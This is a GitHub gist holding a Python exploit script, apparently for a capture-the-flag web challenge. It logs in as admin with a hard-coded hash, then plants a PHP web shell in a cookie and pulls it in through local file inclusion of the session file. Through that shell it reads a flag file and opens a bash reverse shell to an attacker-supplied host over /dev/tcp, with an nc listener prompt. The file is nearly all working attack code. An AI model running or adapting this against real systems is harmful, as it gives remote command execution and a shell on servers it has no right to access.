Created
May 22, 2023 10:28
-
-
Save root-tanishq/c1c17049d662c002b6cce2141ded808b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import requests | |
import time | |
import os | |
import sys | |
import argparse | |
# User Arguments | |
parser = argparse.ArgumentParser() | |
parser.add_argument('-u','--url', type=str,help=f'URL of the vulnerable application',required=True) | |
parser.add_argument('-lh','--lhost', type=str,help=f'LHOST IP on which the reverse shell will be sent',required=True) | |
parser.add_argument('-lp','--lport', type=int,help=f'LPORT on which the reverse shell will be sent',required=True) | |
args = parser.parse_args() | |
# Setting argumented variable | |
BASE_URL = args.url | |
LHOST = args.lhost | |
LPORT = int(args.lport) | |
# Basic session for working exploitation | |
s = requests.Session() | |
def search(cookie , phpsess): | |
dataReq = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c':'cat /tmp/flag.txt' } | |
print('[+] Payload sent') | |
requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq) # Dummy request to change the value of the cookie | |
time.sleep(1) # sleep for waiting for the update change | |
proxy = {'http':'http://127.1:8080','https':'http://127.1:8080'} | |
searchReq = requests.post(BASE_URL + '/home.php' , cookies=cookie, data=dataReq , proxies=proxy) | |
print('[+] Retrieving flag') | |
flag = searchReq.text.split(':"')[2].split('";')[0] | |
print('[*] FLAG => ' + flag) | |
print('[+] Starting process of getting a reverse shell') | |
dataRev = {'search': f'/var/lib/php/sessions/sess_{phpsess}', 'c': f'bash -c "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"' } | |
print(f'[-] (LISTENER)=> Run # nc -lnvp {LPORT}') | |
input('[*] Press Enter to get reverse shell') | |
print('[++++++++] Reverse shell sent check Listener') | |
s.post(BASE_URL + '/home.php' , cookies=cookie , data=dataRev) | |
def login(): | |
print('[+] Trying to Login %s' % (BASE_URL)) | |
loginparams = {'username':'admin','password':'8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918'} | |
loginReq = s.post(BASE_URL + '/authenticate.php' , data=loginparams , allow_redirects=False) | |
if loginReq.text == '': | |
print('[+] Login Successfully') | |
phpsessid = str(s.cookies.get_dict()).split("'")[3] | |
print('[+] PHP session cookie: ' + phpsessid) | |
cookies = {'PHPSESSID':phpsessid , 'user_pref':"<?php+system($_REQUEST['c'])%3b+%3f>"} | |
search(cookies , phpsessid) | |
def main(): | |
# Calls our system here | |
global BASE_URL | |
global LHOST | |
global LPORT | |
login() | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment